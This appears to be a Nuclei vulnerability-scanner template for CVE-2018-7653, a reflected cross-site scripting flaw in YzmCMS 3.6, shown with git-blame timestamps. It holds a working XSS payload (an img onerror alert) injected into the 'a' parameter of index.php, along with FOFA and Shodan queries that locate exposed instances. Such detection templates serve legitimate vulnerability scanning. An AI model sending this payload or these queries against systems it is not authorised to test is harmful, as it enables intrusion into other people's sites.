2023-08-07 17:55:47 +00:00
|
|
|
id: CVE-2018-7653
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: YzmCMS v3.6 - Cross-Site Scripting
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: medium
|
|
|
|
description: In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.
|
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7653
|
2023-08-31 11:46:18 +00:00
|
|
|
- https://github.com/ponyma233/YzmCMS/blob/master/YzmCMS_3.6_bug.md
|
2023-08-07 17:55:47 +00:00
|
|
|
classification:
|
2023-08-07 18:24:36 +00:00
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
2023-08-31 11:46:18 +00:00
|
|
|
cve-id: CVE-2018-7653
|
2023-08-07 18:24:36 +00:00
|
|
|
cwe-id: CWE-79
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.00797
|
|
|
|
cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:*
|
|
|
|
epss-percentile: 0.79437
|
2023-08-07 17:55:47 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
|
|
|
fofa-query: title="YzmCMS"
|
|
|
|
shodan-query: title:"YzmCMS"
|
2023-08-31 11:46:18 +00:00
|
|
|
vendor: yzmcms
|
|
|
|
product: yzmcms
|
|
|
|
tags: packetstorm,cve,cve2018,yzmcms,cms,xss
|
2023-08-07 17:55:47 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '<img src=a onerror=alert(document.domain)>'
|
|
|
|
- 'YzmCMS'
|
|
|
|
condition: and
|
|
|
|
case-insensitive: true
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|